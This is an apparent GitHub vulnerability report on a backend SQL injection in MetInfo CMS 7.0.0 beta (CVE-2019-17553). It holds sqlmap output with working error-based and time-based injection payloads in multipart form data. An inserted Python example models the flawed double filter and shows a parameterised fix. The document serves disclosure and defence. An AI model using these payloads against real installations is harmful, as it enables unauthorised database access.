MetInfo 7.0 beta backend injection #1

Closed
sari3l opened this issue Oct 14, 2019 · 1 comment
Comments

sari3l commented Oct 14, 2019

Vulnerability Name: MetInfo CMS Backend SQL Injection
Product Homepage: https://www.metinfo.cn/
Software link: https://www.metinfo.cn/upload/file/MetInfo7.0.0beta.zip
Version: V7.0.0 beta

We can see the web application uses gpc to filter variables in the form.
Code in app/system/entrance.php:71:

[image: screenshot of app/system/entrance.php:71]

But the developers use the get_sql function for secondary filtering, causing the single quotes to escape.
Code in app/system/tags/admin/index.class.php:171:

[image: screenshot of app/system/tags/admin/index.class.php:171]

Payload:

[image: payload screenshot]

Attack with sqlmap:

Multipart-like data found in POST data. Do you want to process it? [Y/n/q]
[18:25:17] [INFO] resuming back-end DBMS 'mysql'
[18:25:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MULTIPART title ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: ------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_name"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="title"

test' WHERE 5805=5805 AND (SELECT 3007 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(3007=3007,1))),0x717a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aAqw
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="keywords"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="description"

sss
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_pinyin"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="module"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="sort"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_color"


------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_size"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="id"

4
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="submit_type"

save
------WebKitFormBoundaryKV2BbPJBOgFDx0EC--

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: ------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_name"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="title"

test' WHERE 2052=2052 AND SLEEP(5)-- YLsI
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="keywords"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="description"

sss
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_pinyin"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="module"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="sort"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_color"


------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_size"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="id"

4
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="submit_type"

save
------WebKitFormBoundaryKV2BbPJBOgFDx0EC--
---
[18:25:25] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.6.9
back-end DBMS: MySQL >= 5.0
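The filter chain the report describes, modeled as an added example (not code from the issue above and not MetInfo's own code): an entrance-level gpc-style escaping pass, followed by a "secondary filter" after which the single quote reaches the query unescaped, in front of an UPDATE whose WHERE clause the sqlmap payloads hijack (the UPDATE shape is inferred from the `test' WHERE ...--` payloads and the `id=4` / `submit_type=save` fields; the page does not show the query). `gpc_escape`, `secondary_filter`, `build_update_sql` and the `tags` table are hypothetical stand-ins; the real `get_sql` implementation is not on the page. SQLite replaces MySQL, so the `SLEEP()` and `FLOOR(RAND())` payloads are not used and an always-true condition of the same shape stands in. The hardened `safe_save` binds the title as a parameter instead of escaping it.

```python
import re
import sqlite3

# Hypothetical model of the report's two filter stages (not MetInfo code).
# Stage 1: gpc-style escaping applied to every form field at the entrance.
def gpc_escape(value: str) -> str:
    """Backslash-escape ' " \\ and NUL, like PHP addslashes()."""
    return re.sub(r"([\\'\"\x00])", r"\\\1", value)

# Stage 2: a "secondary filter" that strips the backslashes stage 1 added,
# so the quote reaches the SQL string unescaped. This is an assumption that
# models the behaviour the report attributes to get_sql; the real code is
# not shown on the page.
def secondary_filter(value: str) -> str:
    return re.sub(r"\\(.)", r"\1", value, flags=re.S)

def filtered_value(title: str) -> str:
    """What the title looks like after both stages."""
    return secondary_filter(gpc_escape(title))

def build_update_sql(title: str, tag_id: int) -> str:
    """Vulnerable: the 'filtered' title is concatenated into the statement."""
    return f"UPDATE tags SET title='{title}' WHERE id={tag_id}"

def make_db() -> sqlite3.Connection:
    """Constructed sample data: four tags, id 4 is the one being edited."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tags (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO tags VALUES (?, ?)",
        [(1, "news"), (2, "blog"), (3, "docs"), (4, "old")],
    )
    return conn

def vulnerable_save(title: str, tag_id: int) -> list:
    """Run the concatenated UPDATE and return the whole table afterwards."""
    conn = make_db()
    conn.execute(build_update_sql(filtered_value(title), tag_id))
    return conn.execute("SELECT id, title FROM tags ORDER BY id").fetchall()

def safe_save(title: str, tag_id: int) -> list:
    """Hardened: bind the raw title as a parameter; no escaping layer needed."""
    conn = make_db()
    conn.execute("UPDATE tags SET title=? WHERE id=?", (title, tag_id))
    return conn.execute("SELECT id, title FROM tags ORDER BY id").fetchall()

# Same shape as the sqlmap payloads in the report: the quote closes the
# literal, WHERE replaces the real condition, and -- comments out the rest.
# SLEEP() and FLOOR(RAND()) are MySQL-only, so 1=1 stands in here.
PAYLOAD = "test' WHERE 1=1-- "

if __name__ == "__main__":
    print("after gpc_escape:      ", gpc_escape(PAYLOAD))
    print("after secondary_filter:", filtered_value(PAYLOAD))
    print("vulnerable SQL:        ", build_update_sql(filtered_value(PAYLOAD), 4))
    print("vulnerable result:     ", vulnerable_save(PAYLOAD, 4))
    print("parameterised result:  ", safe_save(PAYLOAD, 4))
```

Run stand-alone, the vulnerable path rewrites every row's title because the injected WHERE 1=1 replaces the `id=4` condition, while the parameterised path stores the payload string literally in row 4 only. The check to make in a real code base is the same: look for a second "filter" that touches a value already escaped by a request-level layer, and replace the whole arrangement with bound parameters rather than adding a third layer of escaping.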

sari3l commented Oct 16, 2019

CVE-2019-17553

@sari3l sari3l closed this as completed Oct 16, 2019